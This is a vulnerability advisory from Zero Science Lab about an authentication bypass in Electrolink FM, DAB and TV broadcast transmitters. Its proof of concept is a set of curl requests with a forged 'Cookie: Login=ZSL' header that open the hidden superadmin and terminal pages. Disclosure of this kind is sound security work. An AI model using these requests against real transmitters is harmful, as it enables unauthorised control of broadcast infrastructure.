Headline
Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden Functionality
Electrolink FM/DAB/TV Transmitter allows an unauthenticated attacker to bypass authentication and modify the Cookie to reveal hidden pages that allows more critical operations to the transmitter.
Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden FunctionalityVendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1Summary: Since 1990 Electrolink has been dealing with design andmanufacturing of advanced technologies for radio and televisionbroadcasting. The most comprehensive products range includes: FMTransmitters, DAB Transmitters, TV Transmitters for analogue anddigital multistandard operation, Bandpass Filters (FM, DAB, ATV,DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxialswitches, Manual patch panels, RF power meters, Rigid line andaccessories. A professional solution that meets broadcasters needsfrom small community television or radio to big government networks.Compact DAB Transmitters 10W, 100W and 250W models with 3.5"touch-screen display and in-built state of the art DAB modulator,EDI input and GPS receiver. All transmitters are equipped with astate-of-the art DAB modulator with excellent performances,self-protected and self-controlled amplifiers ensure trouble-freenon-stop operation.100W, 500W, 1kW and 2kW power range available on compact 2U and3U 19" frame. Built-in stereo coder, touch screen display andefficient low noise air cooling system. Available models: 3kW,5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitterswith fully broadband solid state amplifiers and an efficientlow-noise air cooling system.FM digital modulator with excellent specifications, built-instereo and RDS coder. Digital deviation limiter together withASI and SDI inputs are available. These transmitters are readyfor ISOFREQUENCY networks.Available for VHF BI and VHF BIII operation with robust desingand user-friendly local and remote control. Multi-standard UHFTV transmitters from 10W up to 5kW with efficient low noise aircooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSCand ISDB-Tb available.Desc: The device allows an unauthenticated attacker to bypassauthentication and modify the Cookie to reveal hidden pagesthat allows more critical operations to the transmitter.Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research & Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5794Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5794.php30.06.2023--C:\>curl -s "http://192.168.150.77:8888/home.htm" | findstr /spina:d "admin"33:<a class="linkm admin" href="/setting.htm">Setting & Status</a>34:<a class="linkm admin" href="/lan.htm">Setting lan</a>35:<a class="linkm admin" href="/snmp.htm">Setting snmp</a>36:<a class="linkm admin" href="/mail.htm">Setting e-mail</a>37:<a class="linkm admin" href="/login.htm">Setting login</a>38:<a class="linkm admin superadmin" href="/admin.htm">Setting admin</a>39:<a class="linkm admin superadmin" href="/terminal.htm">Terminal</a>...C:\>curl -s "http://192.168.150.77:8888/admin.htm" -H "Cookie: Login=ZSL"C:\>curl -s "http://192.168.150.77:8888/terminal.htm" -H "Cookie: Login=ZSL"